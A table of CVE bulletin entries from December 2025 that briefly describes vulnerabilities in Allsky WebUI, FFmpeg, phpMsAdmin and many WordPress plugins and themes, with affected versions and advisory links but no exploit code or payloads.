| Allsky WebUI--Allsky WebUI | A Path Traversal vulnerability in the Allsky WebUI version v2024.12.06_06 allows an unauthenticated remote attacker to achieve arbitrary command execution. By sending a crafted HTTP request to the /html/execute.php endpoint with a malicious payload in the id parameter, an attacker can execute arbitrary commands on the underlying operating system, leading to full remote code execution (RCE). | 2025-12-16 | not yet calculated | CVE-2025-63414 | https://github.com/AllskyTeam/allsky https://github.com/AllskyTeam/allsky/blob/master/html/execute.php https://gh0stmezh.wordpress.com/2025/12/02/cve-2025-63414/ |
| GT Edge--GT Edge | An issue in GT Edge AI Platform Versions before v2.0.10-dev allows attackers to execute arbitrary code via injecting a crafted JSON payload into the Prompt window. | 2025-12-19 | not yet calculated | CVE-2025-63665 | https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending https://gist.github.com/p80n-sec/e5eefcef155e9dd14aaaaa49f9f94cd1 |
| yuv2ya16_X_c_--yuv2ya16_X_c_ | Integer overflow vulnerability in the yuv2ya16_X_c_template function in libswscale/output.c in FFmpeg 8.0. | 2025-12-18 | not yet calculated | CVE-2025-63757 | https://code.ffmpeg.org/FFmpeg/FFmpeg/pulls/20698 https://gist.github.com/miora-sora/43c1c5616dd5b4f960a9d20296ef4833 https://ffmpeg.org/security.html |
| phpMsAdmin--phpMsAdmin | A Reflected Cross-Site Scripting (XSS) vulnerability exists in phpMsAdmin version 2.2 in the database_mode.php file. An attacker can execute arbitrary web script or HTML via the dbname parameter after a user is authenticated. | 2025-12-18 | not yet calculated | CVE-2025-63947 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/phpMsAdmin/CVE-pending-phpMsAdmin.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/phpMsAdmin/CVE-2025-63947.md |
| phpMsAdmin--phpMsAdmin | A SQL Injection vulnerability exists in phpMsAdmin version 2.2 in the database_mode.php file. An attacker can execute arbitrary SQL commands via the dbname parameter, potentially leading to information disclosure or database manipulation. | 2025-12-18 | not yet calculated | CVE-2025-63948 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/phpMsAdmin/CVE-pending-phpMsAdmin.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/phpMsAdmin/CVE-2025-63948.md |
| yohanawi--yohanawi | A Reflected Cross-Site Scripting (XSS) vulnerability in yohanawi Hotel Management System (commit 87e004a) allows a remote attacker to execute arbitrary web script via the 'error' parameter in pages/room.php. | 2025-12-18 | not yet calculated | CVE-2025-63949 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/Hotel-Management-System/CVE-pending-XSS.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/Hotel-Management-System/CVE-2025-63949.md |
| to3k--Twittodon | An insecure deserialization vulnerability exists in the download.php script of the to3k Twittodon application through commit b1c58a7d1dc664b38deb486ca290779621342c0b (2023-02-28). The 'obj' parameter receives base64-encoded data that is passed directly to the unserialize() function without validation. This allows a remote, unauthenticated attacker to inject arbitrary PHP objects, leading to a denial of service. | 2025-12-18 | not yet calculated | CVE-2025-63950 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/Twittodon/CVE-pending-Deserialization.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/Twittodon/CVE-2025-63950.md |
| MiczFlor--RPi-Jukebox-RFID | An insecure deserialization vulnerability exists in the rss-mp3.php script of the MiczFlor RPi-Jukebox-RFID project through commit 4b2334f0ae0e87c0568876fc41c48c38aa9a7014 (2025-10-07). The 'rss' GET parameter receives data that is passed directly to the unserialize() function without validation. This allows a remote, unauthenticated attacker to inject arbitrary PHP objects, causing the application to process them and leading to errors or a denial of service. | 2025-12-18 | not yet calculated | CVE-2025-63951 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/RPi-Jukebox-RFID/CVE-pending-Deserialization.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/RPi-Jukebox-RFID/CVE-2025-63951.md |
| InvoicePlane--InvoicePlane | InvoicePlane commit debb446c is vulnerable to Incorrect Access Control. The invoices/view handler fails to verify ownership before returning invoice data. | 2025-12-16 | not yet calculated | CVE-2025-64012 | https://github.com/InvoicePlane/InvoicePlane/commit/debb446ceaa84efc136987fc1e21b268f34e47b0 https://gist.github.com/tarekramm/797073e9ae991211ff2ae71ed1190c7d |
| PenciDesign--Soledad | Incorrect Privilege Assignment vulnerability in PenciDesign Soledad soledad allows Privilege Escalation. This issue affects Soledad: from n/a through <= 8.6.9. | 2025-12-18 | not yet calculated | CVE-2025-64188 | https://vdp.patchstack.com/database/Wordpress/Theme/soledad/vulnerability/wordpress-soledad-theme-8-6-9-privilege-escalation-vulnerability?_s_id=cve |
| 8theme--XStore Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme XStore Core et-core-plugin allows Reflected XSS. This issue affects XStore Core: from n/a through < 5.6. | 2025-12-18 | not yet calculated | CVE-2025-64189 | https://vdp.patchstack.com/database/Wordpress/Plugin/et-core-plugin/vulnerability/wordpress-xstore-core-plugin-5-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| 8theme--XStore | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme XStore xstore allows Reflected XSS. This issue affects XStore: from n/a through < 9.6.1. | 2025-12-18 | not yet calculated | CVE-2025-64191 | https://vdp.patchstack.com/database/Wordpress/Theme/xstore/vulnerability/wordpress-xstore-theme-9-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| 8theme--XStore | Missing Authorization vulnerability in 8theme XStore xstore allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects XStore: from n/a through < 9.6. | 2025-12-18 | not yet calculated | CVE-2025-64192 | https://vdp.patchstack.com/database/Wordpress/Theme/xstore/vulnerability/wordpress-xstore-theme-9-6-broken-access-control-vulnerability?_s_id=cve |
| 8theme--XStore | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in 8theme XStore xstore allows PHP Local File Inclusion. This issue affects XStore: from n/a through < 9.6.1. | 2025-12-18 | not yet calculated | CVE-2025-64193 | https://vdp.patchstack.com/database/Wordpress/Theme/xstore/vulnerability/wordpress-xstore-theme-9-6-1-local-file-inclusion-vulnerability?_s_id=cve |
| EverPress--Mailster | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EverPress Mailster mailster allows Reflected XSS. This issue affects Mailster: from n/a through < 4.1.14. | 2025-12-18 | not yet calculated | CVE-2025-64203 | https://vdp.patchstack.com/database/Wordpress/Plugin/mailster/vulnerability/wordpress-mailster-plugin-4-1-14-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TieLabs--Jannah | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TieLabs Jannah jannah allows PHP Local File Inclusion. This issue affects Jannah: from n/a through <= 7.6.0. | 2025-12-18 | not yet calculated | CVE-2025-64205 | https://vdp.patchstack.com/database/Wordpress/Theme/jannah/vulnerability/wordpress-jannah-theme-7-6-0-local-file-inclusion-vulnerability?_s_id=cve |
| TieLabs--Jannah | Deserialization of Untrusted Data vulnerability in TieLabs Jannah jannah allows Object Injection. This issue affects Jannah: from n/a through <= 7.6.0. | 2025-12-18 | not yet calculated | CVE-2025-64206 | https://vdp.patchstack.com/database/Wordpress/Theme/jannah/vulnerability/wordpress-jannah-theme-7-6-0-php-object-injection-vulnerability?_s_id=cve |
| TieLabs--Jannah | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TieLabs Jannah jannah allows DOM-Based XSS. This issue affects Jannah: from n/a through <= 7.6.0. | 2025-12-18 | not yet calculated | CVE-2025-64207 | https://vdp.patchstack.com/database/Wordpress/Theme/jannah/vulnerability/wordpress-jannah-theme-7-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| StylemixThemes--Masterstudy | Missing Authorization vulnerability in StylemixThemes Masterstudy masterstudy allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Masterstudy: from n/a through < 4.8.122. | 2025-12-18 | not yet calculated | CVE-2025-64209 | https://vdp.patchstack.com/database/Wordpress/Theme/masterstudy/vulnerability/wordpress-masterstudy-theme-4-8-122-broken-access-control-vulnerability?_s_id=cve |
| StylemixThemes--MasterStudy LMS Pro | Insertion of Sensitive Information Into Sent Data vulnerability in StylemixThemes MasterStudy LMS Pro masterstudy-lms-learning-management-system-pro allows Retrieve Embedded Sensitive Data. This issue affects MasterStudy LMS Pro: from n/a through < 4.7.16. | 2025-12-18 | not yet calculated | CVE-2025-64213 | https://vdp.patchstack.com/database/Wordpress/Plugin/masterstudy-lms-learning-management-system-pro/vulnerability/wordpress-masterstudy-lms-pro-plugin-4-7-16-sensitive-data-exposure-vulnerability?_s_id=cve |
| StylemixThemes--MasterStudy LMS Pro | Missing Authorization vulnerability in StylemixThemes MasterStudy LMS Pro masterstudy-lms-learning-management-system-pro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects MasterStudy LMS Pro: from n/a through < 4.7.16. | 2025-12-18 | not yet calculated | CVE-2025-64214 | https://vdp.patchstack.com/database/Wordpress/Plugin/masterstudy-lms-learning-management-system-pro/vulnerability/wordpress-masterstudy-lms-pro-plugin-4-7-16-arbitrary-content-deletion-vulnerability?_s_id=cve |
| ThemeGoods--Photography | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Photography photography allows Reflected XSS.This issue affects Photography: from n/a through <= 7.7.2. | 2025-12-18 | not yet calculated | CVE-2025-64217 | https://vdp.patchstack.com/database/Wordpress/Theme/photography/vulnerability/wordpress-photography-theme-7-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WP Chill--Passster | Insertion of Sensitive Information Into Sent Data vulnerability in WP Chill Passster content-protector allows Retrieve Embedded Sensitive Data.This issue affects Passster: from n/a through <= 4.2.19. | 2025-12-18 | not yet calculated | CVE-2025-64218 | https://vdp.patchstack.com/database/Wordpress/Plugin/content-protector/vulnerability/wordpress-passster-plugin-4-2-19-sensitive-data-exposure-vulnerability?_s_id=cve |
| designthemes--Reservation Plugin | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes Reservation Plugin dt-reservation-plugin allows Reflected XSS.This issue affects Reservation Plugin: from n/a through <= 1.6. | 2025-12-18 | not yet calculated | CVE-2025-64221 | https://vdp.patchstack.com/database/Wordpress/Plugin/dt-reservation-plugin/vulnerability/wordpress-reservation-plugin-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FantasticPlugins--WooCommerce Recover Abandoned Cart | Missing Authorization vulnerability in FantasticPlugins WooCommerce Recover Abandoned Cart rac allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Recover Abandoned Cart: from n/a through <= 24.6.0. | 2025-12-18 | not yet calculated | CVE-2025-64222 | https://vdp.patchstack.com/database/Wordpress/Plugin/rac/vulnerability/wordpress-woocommerce-recover-abandoned-cart-plugin-24-6-0-arbitrary-content-deletion-vulnerability?_s_id=cve |
| PenciDesign--PenNews | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in PenciDesign PenNews pennews allows PHP Local File Inclusion.This issue affects PenNews: from n/a through < 6.7.3. | 2025-12-18 | not yet calculated | CVE-2025-64223 | https://vdp.patchstack.com/database/Wordpress/Theme/pennews/vulnerability/wordpress-pennews-theme-6-7-3-local-file-inclusion-vulnerability?_s_id=cve |
| colabrio--Stockie Extra | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in colabrio Stockie Extra stockie-extra allows Code Injection.This issue affects Stockie Extra: from n/a through <= 1.2.11. | 2025-12-18 | not yet calculated | CVE-2025-64225 | https://vdp.patchstack.com/database/Wordpress/Plugin/stockie-extra/vulnerability/wordpress-stockie-extra-plugin-1-2-11-content-injection-vulnerability?_s_id=cve |
| BoldGrid--Client Invoicing by Sprout Invoices | Deserialization of Untrusted Data vulnerability in BoldGrid Client Invoicing by Sprout Invoices sprout-invoices allows Object Injection.This issue affects Client Invoicing by Sprout Invoices: from n/a through <= 20.8.7. | 2025-12-18 | not yet calculated | CVE-2025-64227 | https://vdp.patchstack.com/database/Wordpress/Plugin/sprout-invoices/vulnerability/wordpress-client-invoicing-by-sprout-invoices-plugin-20-8-7-php-object-injection-vulnerability?_s_id=cve |
| WP Chill--Filr | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WP Chill Filr filr-protection allows Path Traversal.This issue affects Filr: from n/a through <= 1.2.10. | 2025-12-18 | not yet calculated | CVE-2025-64230 | https://vdp.patchstack.com/database/Wordpress/Plugin/filr-protection/vulnerability/wordpress-filr-plugin-1-2-10-arbitrary-file-deletion-vulnerability?_s_id=cve |
| RedefiningTheWeb--WordPress Contact Form 7 PDF, Google Sheet & Database | Unrestricted Upload of File with Dangerous Type vulnerability in RedefiningTheWeb WordPress Contact Form 7 PDF, Google Sheet & Database rtwwcfp-wordpress-contact-form-7-pdf allows Using Malicious Files.This issue affects WordPress Contact Form 7 PDF, Google Sheet & Database: from n/a through <= 3.0.0. | 2025-12-18 | not yet calculated | CVE-2025-64231 | https://vdp.patchstack.com/database/Wordpress/Plugin/rtwwcfp-wordpress-contact-form-7-pdf/vulnerability/wordpress-wordpress-contact-form-7-pdf-google-sheet-database-plugin-3-0-0-arbitrary-file-upload-vulnerability?_s_id=cve |
| BoldThemes--Codiqa | Deserialization of Untrusted Data vulnerability in BoldThemes Codiqa codiqa allows Object Injection.This issue affects Codiqa: from n/a through < 1.2.8. | 2025-12-18 | not yet calculated | CVE-2025-64233 | https://vdp.patchstack.com/database/Wordpress/Theme/codiqa/vulnerability/wordpress-codiqa-theme-1-2-8-php-object-injection-vulnerability?_s_id=cve |
| Graham--Quick Interest Slider | Cross-Site Request Forgery (CSRF) vulnerability in Graham Quick Interest Slider quick-interest-slider allows Cross Site Request Forgery.This issue affects Quick Interest Slider: from n/a through <= 3.1.5. | 2025-12-16 | not yet calculated | CVE-2025-64237 | https://vdp.patchstack.com/database/Wordpress/Plugin/quick-interest-slider/vulnerability/wordpress-quick-interest-slider-plugin-3-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| NicolasKulka--WPS Bidouille | Missing Authorization vulnerability in NicolasKulka WPS Bidouille wps-bidouille allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPS Bidouille: from n/a through <= 1.33.1. | 2025-12-16 | not yet calculated | CVE-2025-64238 | https://vdp.patchstack.com/database/Wordpress/Plugin/wps-bidouille/vulnerability/wordpress-wps-bidouille-plugin-1-33-1-broken-access-control-vulnerability?_s_id=cve |
| Yoav Farhi--RTL Tester | Cross-Site Request Forgery (CSRF) vulnerability in Yoav Farhi RTL Tester rtl-tester allows Cross Site Request Forgery.This issue affects RTL Tester: from n/a through <= 1.2. | 2025-12-16 | not yet calculated | CVE-2025-64239 | https://vdp.patchstack.com/database/Wordpress/Plugin/rtl-tester/vulnerability/wordpress-rtl-tester-plugin-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| freshchat--Freshchat | Cross-Site Request Forgery (CSRF) vulnerability in freshchat Freshchat freshchat allows Cross Site Request Forgery.This issue affects Freshchat: from n/a through <= 2.3.4. | 2025-12-16 | not yet calculated | CVE-2025-64240 | https://vdp.patchstack.com/database/Wordpress/Plugin/freshchat/vulnerability/wordpress-freshchat-plugin-2-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Imtiaz Rayhan--WP Coupons and Deals | Missing Authorization vulnerability in Imtiaz Rayhan WP Coupons and Deals wp-coupons-and-deals allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Coupons and Deals: from n/a through <= 3.2.4. | 2025-12-16 | not yet calculated | CVE-2025-64241 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-coupons-and-deals/vulnerability/wordpress-wp-coupons-and-deals-plugin-3-2-4-broken-access-control-vulnerability?_s_id=cve |
| Merv Barrett--Easy Property Listings | Missing Authorization vulnerability in Merv Barrett Easy Property Listings easy-property-listings allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Property Listings: from n/a through <= 3.5.15. | 2025-12-16 | not yet calculated | CVE-2025-64242 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-property-listings/vulnerability/wordpress-easy-property-listings-plugin-3-5-15-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Directory Pro | Missing Authorization vulnerability in e-plugins Directory Pro directory-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Directory Pro: from n/a through <= 2.5.6. | 2025-12-16 | not yet calculated | CVE-2025-64243 | https://vdp.patchstack.com/database/Wordpress/Plugin/directory-pro/vulnerability/wordpress-directory-pro-plugin-2-5-6-broken-access-control-vulnerability?_s_id=cve |
| Codexpert, Inc--Restrict Elementor Widgets, Columns and Sections | Missing Authorization vulnerability in Codexpert, Inc Restrict Elementor Widgets, Columns and Sections restrict-elementor-widgets allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Restrict Elementor Widgets, Columns and Sections: from n/a through <= 1.12. | 2025-12-16 | not yet calculated | CVE-2025-64244 | https://vdp.patchstack.com/database/Wordpress/Plugin/restrict-elementor-widgets/vulnerability/wordpress-restrict-elementor-widgets-columns-and-sections-plugin-1-12-broken-access-control-vulnerability?_s_id=cve |
| ryanpcmcquen--Import external attachments | Missing Authorization vulnerability in ryanpcmcquen Import external attachments import-external-attachments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Import external attachments: from n/a through <= 1.5.12. | 2025-12-16 | not yet calculated | CVE-2025-64245 | https://vdp.patchstack.com/database/Wordpress/Plugin/import-external-attachments/vulnerability/wordpress-import-external-attachments-plugin-1-5-12-broken-access-control-vulnerability?_s_id=cve |
| netopsae--Accessibility by AudioEye | Missing Authorization vulnerability in netopsae Accessibility by AudioEye accessibility-by-audioeye allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accessibility by AudioEye: from n/a through <= 1.0.49. | 2025-12-16 | not yet calculated | CVE-2025-64246 | https://vdp.patchstack.com/database/Wordpress/Plugin/accessibility-by-audioeye/vulnerability/wordpress-accessibility-by-audioeye-plugin-1-0-49-broken-access-control-vulnerability?_s_id=cve |
| edmon.parker--Read More & Accordion | Missing Authorization vulnerability in edmon.parker Read More & Accordion expand-maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Read More & Accordion: from n/a through <= 3.5.4.1. | 2025-12-16 | not yet calculated | CVE-2025-64247 | https://vdp.patchstack.com/database/Wordpress/Plugin/expand-maker/vulnerability/wordpress-read-more-accordion-plugin-3-5-4-1-broken-access-control-vulnerability?_s_id=cve |
| emarket-design--Request a Quote | Missing Authorization vulnerability in emarket-design Request a Quote request-a-quote allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Request a Quote: from n/a through <= 2.5.3. | 2025-12-16 | not yet calculated | CVE-2025-64248 | https://vdp.patchstack.com/database/Wordpress/Plugin/request-a-quote/vulnerability/wordpress-request-a-quote-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve |
| WP-EXPERTS.IN--Protect WP Admin | Missing Authorization vulnerability in WP-EXPERTS.IN Protect WP Admin protect-wp-admin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Protect WP Admin: from n/a through <= 4.1. | 2025-12-16 | not yet calculated | CVE-2025-64249 | https://vdp.patchstack.com/database/Wordpress/Plugin/protect-wp-admin/vulnerability/wordpress-protect-wp-admin-plugin-4-1-broken-access-control-vulnerability?_s_id=cve |
| wpWax--Directorist | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in wpWax Directorist directorist allows Phishing.This issue affects Directorist: from n/a through <= 8.5.6. | 2025-12-16 | not yet calculated | CVE-2025-64250 | https://vdp.patchstack.com/database/Wordpress/Plugin/directorist/vulnerability/wordpress-directorist-plugin-8-5-6-open-redirection-vulnerability?_s_id=cve |
| azzaroco--Ultimate Learning Pro | Missing Authorization vulnerability in azzaroco Ultimate Learning Pro indeed-learning-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Learning Pro: from n/a through <= 3.9.3. | 2025-12-16 | not yet calculated | CVE-2025-64251 | https://vdp.patchstack.com/database/Wordpress/Plugin/indeed-learning-pro/vulnerability/wordpress-ultimate-learning-pro-plugin-3-9-3-arbitrary-content-deletion-vulnerability?_s_id=cve |
| WordPress.org--Health Check & Troubleshooting | Path Traversal: '.../...//' vulnerability in WordPress.org Health Check & Troubleshooting health-check allows Path Traversal.This issue affects Health Check & Troubleshooting: from n/a through <= 1.7.1. | 2025-12-16 | not yet calculated | CVE-2025-64253 | https://vdp.patchstack.com/database/Wordpress/Plugin/health-check/vulnerability/wordpress-health-check-troubleshooting-plugin-1-7-1-path-traversal-vulnerability?_s_id=cve |
| wpweb--Follow My Blog Post | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in wpweb Follow My Blog Post follow-my-blog-post allows Retrieve Embedded Sensitive Data.This issue affects Follow My Blog Post: from n/a through <= 2.3.9. | 2025-12-18 | not yet calculated | CVE-2025-64258 | https://vdp.patchstack.com/database/Wordpress/Plugin/follow-my-blog-post/vulnerability/wordpress-follow-my-blog-post-plugin-2-3-9-sensitive-data-exposure-vulnerability?_s_id=cve |
| Marco Milesi--ANAC XML Bandi di Gara | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Marco Milesi ANAC XML Bandi di Gara avcp allows Reflected XSS.This issue affects ANAC XML Bandi di Gara: from n/a through <= 7.7. | 2025-12-18 | not yet calculated | CVE-2025-64260 | https://vdp.patchstack.com/database/Wordpress/Plugin/avcp/vulnerability/wordpress-anac-xml-bandi-di-gara-plugin-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| magepeopleteam--Booking and Rental Manager | Deserialization of Untrusted Data vulnerability in magepeopleteam Booking and Rental Manager booking-and-rental-manager-for-woocommerce allows Object Injection.This issue affects Booking and Rental Manager: from n/a through <= 2.5.4. | 2025-12-18 | not yet calculated | CVE-2025-64266 | https://vdp.patchstack.com/database/Wordpress/Plugin/booking-and-rental-manager-for-woocommerce/vulnerability/wordpress-booking-and-rental-manager-plugin-2-5-4-php-object-injection-vulnerability?_s_id=cve |
| Arraytics--Timetics | Missing Authorization vulnerability in Arraytics Timetics timetics allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Timetics: from n/a through <= 1.0.44. | 2025-12-18 | not yet calculated | CVE-2025-64268 | https://vdp.patchstack.com/database/Wordpress/Plugin/timetics/vulnerability/wordpress-timetics-plugin-1-0-44-broken-access-control-vulnerability?_s_id=cve |
| masteriyo--Masteriyo - LMS | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in masteriyo Masteriyo - LMS learning-management-system allows Retrieve Embedded Sensitive Data.This issue affects Masteriyo - LMS: from n/a through <= 2.0.3. | 2025-12-18 | not yet calculated | CVE-2025-64270 | https://vdp.patchstack.com/database/Wordpress/Plugin/learning-management-system/vulnerability/wordpress-masteriyo-lms-plugin-2-0-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| GetResponse--Email marketing for WordPress by GetResponse Official | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in GetResponse Email marketing for WordPress by GetResponse Official getresponse-official allows Retrieve Embedded Sensitive Data.This issue affects Email marketing for WordPress by GetResponse Official: from n/a through <= 1.5.3. | 2025-12-18 | not yet calculated | CVE-2025-64272 | https://vdp.patchstack.com/database/Wordpress/Plugin/getresponse-official/vulnerability/wordpress-email-marketing-for-wordpress-by-getresponse-official-plugin-1-5-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| GetResponse--Email marketing for WordPress by GetResponse Official | Missing Authorization vulnerability in GetResponse Email marketing for WordPress by GetResponse Official getresponse-official allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Email marketing for WordPress by GetResponse Official: from n/a through <= 1.5.3. | 2025-12-18 | not yet calculated | CVE-2025-64273 | https://vdp.patchstack.com/database/Wordpress/Plugin/getresponse-official/vulnerability/wordpress-email-marketing-for-wordpress-by-getresponse-official-plugin-1-5-3-broken-access-control-vulnerability?_s_id=cve |
| Syed Balkhi--All In One SEO Pack | Insertion of Sensitive Information Into Sent Data vulnerability in Syed Balkhi All In One SEO Pack all-in-one-seo-pack allows Retrieve Embedded Sensitive Data.This issue affects All In One SEO Pack: from n/a through <= 4.8.6.1. | 2025-12-18 | not yet calculated | CVE-2025-64295 | https://vdp.patchstack.com/database/Wordpress/Plugin/all-in-one-seo-pack/vulnerability/wordpress-all-in-one-seo-pack-plugin-4-8-6-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. In versions 5.5.2 - #156 and below, an authenticated regular user can create a photo collection whose Collection Name contains HTML/JavaScript payloads, which makes ClipBucket's Manage Photos feature vulnerable to Stored XSS. The payload is rendered unsafely in the Admin → Manage Photos interface, causing it to execute in the administrator's browser and therefore allowing an attacker to target administrators and perform actions with elevated privileges. This issue is fixed in version 5.5.2 - #157. | 2025-12-15 | not yet calculated | CVE-2025-64338 | https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-93rh-fxxx-j38j https://github.com/MacWarrior/clipbucket-v5/commit/8e3cf79ce2721fbebde68a05a9a1a6319f086bcc |
| shinetheme--Traveler | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection. This issue affects Traveler: from n/a through < 3.2.6. | 2025-12-18 | not yet calculated | CVE-2025-64371 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-sql-injection-vulnerability?_s_id=cve |
| shinetheme--Traveler | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in shinetheme Traveler traveler allows Reflected XSS. This issue affects Traveler: from n/a through < 3.2.6. | 2025-12-18 | not yet calculated | CVE-2025-64372 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| shinetheme--Traveler | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in shinetheme Traveler traveler allows PHP Local File Inclusion. This issue affects Traveler: from n/a through < 3.2.6. | 2025-12-18 | not yet calculated | CVE-2025-64373 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-local-file-inclusion-vulnerability?_s_id=cve |
| StylemixThemes--Motors | Unrestricted Upload of File with Dangerous Type vulnerability in StylemixThemes Motors motors allows Using Malicious Files. This issue affects Motors: from n/a through <= 5.6.81. | 2025-12-18 | not yet calculated | CVE-2025-64374 | https://vdp.patchstack.com/database/Wordpress/Theme/motors/vulnerability/wordpress-motors-theme-5-6-80-arbitrary-file-upload-vulnerability?_s_id=cve |
| Mahmudul Hasan Arif--WP Social Ninja | Missing Authorization vulnerability in Mahmudul Hasan Arif WP Social Ninja wp-social-reviews allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Social Ninja: from n/a through <= 3.20.1. | 2025-12-18 | not yet calculated | CVE-2025-64375 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-social-reviews/vulnerability/wordpress-wp-social-ninja-plugin-3-20-1-broken-access-control-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro listingpro allows Reflected XSS. This issue affects ListingPro: from n/a through < 2.9.10. | 2025-12-18 | not yet calculated | CVE-2025-64376 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-10-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CridioStudio ListingPro listingpro allows PHP Local File Inclusion. This issue affects ListingPro: from n/a through < 2.9.10. | 2025-12-18 | not yet calculated | CVE-2025-64377 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-10-local-file-inclusion-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ListingPro: from n/a through < 2.9.10. | 2025-12-18 | not yet calculated | CVE-2025-64378 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-10-broken-access-control-vulnerability?_s_id=cve |
| Strategy11 Team--Business Directory | Missing Authorization vulnerability in Strategy11 Team Business Directory business-directory-plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Business Directory: from n/a through <= 6.4.19. | 2025-12-16 | not yet calculated | CVE-2025-64630 | https://vdp.patchstack.com/database/Wordpress/Plugin/business-directory-plugin/vulnerability/wordpress-business-directory-plugin-6-4-19-broken-access-control-vulnerability?_s_id=cve |
| WC Lovers--WCFM Marketplace | Missing Authorization vulnerability in WC Lovers WCFM Marketplace wc-multivendor-marketplace allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WCFM Marketplace: from n/a through <= 3.6.15. | 2025-12-16 | not yet calculated | CVE-2025-64631 | https://vdp.patchstack.com/database/Wordpress/Plugin/wc-multivendor-marketplace/vulnerability/wordpress-wcfm-marketplace-plugin-3-6-15-broken-access-control-vulnerability?_s_id=cve |
